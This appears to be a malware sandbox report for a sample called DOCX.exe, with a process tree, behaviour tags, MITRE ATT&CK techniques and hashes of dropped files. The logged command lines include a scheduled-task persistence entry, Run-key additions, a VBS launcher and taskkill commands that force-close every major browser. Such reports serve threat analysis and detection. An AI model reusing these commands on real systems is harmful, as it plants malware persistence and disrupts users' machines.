C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,1766981434292643661,5369986512763397143,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:14⤵PID:840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,1766981434292643661,5369986512763397143,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5248 /prefetch:84⤵PID:5012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,1766981434292643661,5369986512763397143,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5248 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,1766981434292643661,5369986512763397143,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4056 /prefetch:14⤵PID:2428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,1766981434292643661,5369986512763397143,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:14⤵PID:620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2104,1766981434292643661,5369986512763397143,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5668 /prefetch:84⤵PID:2096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,1766981434292643661,5369986512763397143,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5160 /prefetch:14⤵PID:4420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2104,1766981434292643661,5369986512763397143,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5172 /prefetch:84⤵
- Suspicious behavior: EnumeratesProcesses
PID:4360
-
-
-
C:\Windows\system32\timeout.exetimeout /t 153⤵
- Delays execution with timeout.exe
PID:4916
-
-
C:\Program Files\7-Zip\7z.exe"C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\Downloads\DOCX.zip" -o"C:\Users\Admin\Downloads" -pFuckSyrialAndFreePsAndFreeSyria009633⤵
- Suspicious use of AdjustPrivilegeToken
PID:392
-
-
C:\Windows\system32\timeout.exetimeout /t 153⤵
- Delays execution with timeout.exe
PID:3760
-
-
C:\Users\Admin\AppData\Local\Temp\Startup\DOCX.exe"C:\Users\Admin\AppData\Local\Temp\Startup\DOCX.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2152 -
C:\Users\Admin\AppData\Local\Temp\._cache_DOCX.exe"C:\Users\Admin\AppData\Local\Temp\._cache_DOCX.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:1144 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn TGWEKK.exe /tr C:\Users\Admin\AppData\Roaming\Windata\XVZBZS.exe /sc minute /mo 15⤵
- System Location Discovery: System Language Discovery
PID:2284 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn TGWEKK.exe /tr C:\Users\Admin\AppData\Roaming\Windata\XVZBZS.exe /sc minute /mo 16⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:976
-
-
-
C:\Windows\SysWOW64\WSCript.exeWSCript C:\Users\Admin\AppData\Local\Temp\TGWEKK.vbs5⤵
- System Location Discovery: System Language Discovery
PID:4836
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4428 -
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1840
-
-
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2896
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM firefox.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4448
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM msedge.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1812
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM iexplore.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:976
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM opera.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2656
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM safari.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1740
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM brave.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3272
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM vivaldi.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4032
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM epic.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2760
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM yandex.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3284
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM tor.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4092
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM CMD.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4448
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2044
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4228
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3868
-
C:\Users\Admin\AppData\Roaming\Windata\XVZBZS.exeC:\Users\Admin\AppData\Roaming\Windata\XVZBZS.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3124
-
C:\Users\Admin\AppData\Roaming\Windata\XVZBZS.exeC:\Users\Admin\AppData\Roaming\Windata\XVZBZS.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2532
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Hijack Execution Flow
1Executable Installer File Permissions Weakness
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Hijack Execution Flow
1Executable Installer File Permissions Weakness
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hijack Execution Flow
1Executable Installer File Permissions Weakness
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
152B
MD534d2c4f40f47672ecdf6f66fea242f4a
SHA14bcad62542aeb44cae38a907d8b5a8604115ada2
SHA256b214e3affb02a2ea4469a8bbdfa8a179e7cc57cababd83b4bafae9cdbe23fa33
SHA51250fba54ec95d694211a005d0e3e6cf5b5677efa16989cbf854207a1a67e3a139f32b757c6f2ce824a48f621440b93fde60ad1dc790fcec4b76edddd0d92a75d6
-
Filesize
152B
MD58749e21d9d0a17dac32d5aa2027f7a75
SHA1a5d555f8b035c7938a4a864e89218c0402ab7cde
SHA256915193bd331ee9ea7c750398a37fbb552b8c5a1d90edec6293688296bda6f304
SHA512c645a41180ed01e854f197868283f9b40620dbbc813a1c122f6870db574ebc1c4917da4d320bdfd1cc67f23303a2c6d74e4f36dd9d3ffcfa92d3dfca3b7ca31a
-
Filesize
5KB
MD5a6cef9cefd7c027598c36b4e26980c21
SHA1879d32686d6d08ba22956ddffb42baa78e29489d
SHA2563b361165d9bc89b13fcb0b182df3ceb22fd709f6c05a7f90fcb1ae5cb84dd849
SHA51249b082991b183d7d8dbc36dde939507a39982d3eecbed1f061536c6966c8e790f549d1cbe0d3a9029954102d63f8f1270dcfc2244b9848e1f4e71396c3f84984
-
Filesize
6KB
MD51daddc2f37abef2df0e360d35c617385
SHA11f38483d6683fd8148c122919c3962821d062548
SHA25638380ab9ec9f2d84733150f05a3b561dd15a8fbf79ba82086acefb8a59cc529d
SHA512516ef291e0e785eb9105143a77eec02ab173abcf0221d0d7c9170931cc5a0e6b84ec199e0b99856419885e895ae14e8b165079fbe4742b0b504c245dd575b431
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
10KB
MD54cfb97aeb3a059d395156fe016bbe8b6
SHA17e99b5d4945a02303d17785a5bb23785a57ada73
SHA256779044b9637697e1725621afb058056556506f373f4a025c202157097d501ccb
SHA5125ff8d3c0d26be95b0a84be1310cf1898ed82c3f536ce57af77e1233ba8389198893a1c1f11b8bd3688334c9dfc41e27324be735461a401f1607236de0699e8f0
-
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres
Filesize4KB
MD54225099e8b15bafd145ef679e44e3fac
SHA1372e28a88ee67f3f2e7d8dedbed0c7ea973e57bd
SHA256d43ae34aa87763d231f1d887430f854c86cae41561c47fc61fdf29c0e462e8d3
SHA51299e09e5b25cecb66c30fa19ca9a6b9311e8b5a7e526be9ab1554d63a737c98056d912115cfbf568279f593aeab58221f8a5c8d219ea0e9533cb9d5f9da5ce9b3
-
Filesize
944B
MD5cae60f0ddddac635da71bba775a2c5b4
SHA1386f1a036af61345a7d303d45f5230e2df817477
SHA256b2dd636b7b0d3bfe44cef5e1175828b1fa7bd84d5563f54342944156ba996c16
SHA51228ed8a8bc132ef56971cfd7b517b17cdb74a7f8c247ef6bff232996210075e06aa58a415825a1e038cfb547ad3dc6882bf1ca1b68c5b360ef0512a1440850253
-
Filesize
944B
MD5b51dc9e5ec3c97f72b4ca9488bbb4462
SHA15c1e8c0b728cd124edcacefb399bbd5e25b21bd3
SHA256976f9534aa2976c85c2455bdde786a3f55d63aefdd40942eba1223c4c93590db
SHA5120e5aa6cf64c535aefb833e5757b68e1094c87424abe2615a7d7d26b1b31eff358d12e36e75ca57fd690a9919b776600bf4c5c0e5a5df55366ba62238bdf3f280
-
Filesize
944B
MD515dde0683cd1ca19785d7262f554ba93
SHA1d039c577e438546d10ac64837b05da480d06bf69
SHA256d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961
SHA51257c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672
-
Filesize
1KB
MD5a2b24af1492f112d2e53cb7415fda39f
SHA1dbfcee57242a14b60997bd03379cc60198976d85
SHA256fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073
SHA5129919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0
-
Filesize
1KB
MD5f1c10b5a8a1723292d7f2497fc0ea413
SHA1d5008d39de67668cacf974188b9b2a03063a31c5
SHA256431bb1eb5470b7a2506e73760b9899a72889500004847f2c4d54fdea34562a73
SHA5127f1e237afc313b3cba6d1b612e28915398f2f82e915fc8bb751890a46b19842bfddc894674980f35d85d6003ba8d20798471b1d5e194a2fa95bb99c0a9a9fc00
-
Filesize
944B
MD50dfc87d52784026f73d57192cb575195
SHA1720cfc0cff7f21a4ab235f5b3a16beb28ea6d9fd
SHA256bfd4b6a533b4e3a2a884e6f1445f646a3d83a41f6e4060964279c9b4c87a5ef2
SHA512c6c98a666ff7880bdeaae69e200ee93fe0d6e0bfd4046bd184cf5d8209fd18439f9bfb8e3e8b5e75656c3c0deaf2dea2843061df1c2a98310dd5405cb7458604
-
Filesize
944B
MD5ba169f4dcbbf147fe78ef0061a95e83b
SHA192a571a6eef49fff666e0f62a3545bcd1cdcda67
SHA2565ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1
SHA5128d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c
-
Filesize
917KB
MD514ae5a17618d08f48a350e9496c2c959
SHA1678bea5c7d0bb18d0dcab46c646536de5a51d24f
SHA25636dac4b76a8c3ea977d141ee3df142383efa9b0bc24d19da949d106d0b602207
SHA512fca819082bd9479a7d8bcf27203f4a832e6148dc44655463a28490ca3c3f39f5d1d5ae57f6c235a03fca136b6e315338e776040d1ad18eb200d3953e73d464c2
-
Filesize
21KB
MD5d6c1c5ebbfd0baa01deb5ef6a1803b70
SHA1b2444d5217a5735e85f9aae01ebb3bc028cf94e2
SHA256073bb566fbcf3d00f82230dbcdefe5809ce363080755dd04c4ef6dc13f27b85e
SHA5123caa48388f4dc6ae274d7e1aa62fe60f8be38de1b9d90d2cc619c06ca67b68964678c0c2e8ae1ae9c39b52323a8f59422197cb10229021cb8ba513100dbe3600
-
Filesize
1KB
MD545a66afa3b07b3143f0d0c3515898bae
SHA1cc5baf0c4d2fc0b034974786f20087e058915693
SHA2568a8c558b5cb169e5d2967dc3e69cb26174bdd8d457903f074477ef1c555b4fb6
SHA51204aee35c068225ec8982fc273fd4e4e172cf336b26561d5b8c7ccf3fe972c485b962d01bdcfab2a27fe456364114417dc3c44852d8431def9a04812e8008106f
-
Filesize
17KB
MD5e566fc53051035e1e6fd0ed1823de0f9
SHA100bc96c48b98676ecd67e81a6f1d7754e4156044
SHA2568e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15
SHA512a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04
-
Filesize
844B
MD587c2fe360d7d70c430a6a914e00eb4a4
SHA13f014ac92386d9e5f5458c23837cd108e2440c8d
SHA25655dbc17961004caaec6adb4ac282818b533b141e4b8548fc3a88f73c6b8c20f0
SHA512794139f40c2a0d2609a2119cf4752c6b9c0a7279ae5348470c59305394569d2204c1f2c05584947ed475265e6f009a98479353b12f383e5134f3deb97e9ab2ce
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.6MB
MD5a0177c0a9f2254179b112eecf3c58cc6
SHA103478f572f818c8ffd7f8ebe23632432e82e4461
SHA25655d2bea108eeaabcdf59d449cf15f0efabb59e243d9bd91ff0b0805cd3d133df
SHA5120247f803d5018659899766fe8758c14081b1fe9f414c2afb8f34e78569bf5e9063b746c3adf388b60017367070582e7d8b9422ae94bcef4c8c0d39fa7e4a4470
-
Filesize
1.2MB
MD5f5ab8279f54707922e6ae1f83b93478a
SHA1528cf2ac4df0aeb4ecac7e989b06f7461d24ea3c
SHA256d7c01f4991abc009f182b7dd457da87deca1c3a4db05b25d4f1b058fcc8a8339
SHA5129a0832e381f9407049f33a0ef86e96b924253dd6f7e42c20514a49528bc7bd024767dd4b06c10edf98fe5ae90bd48109fbca1a820dd8428ea22a3f68e9d9dab1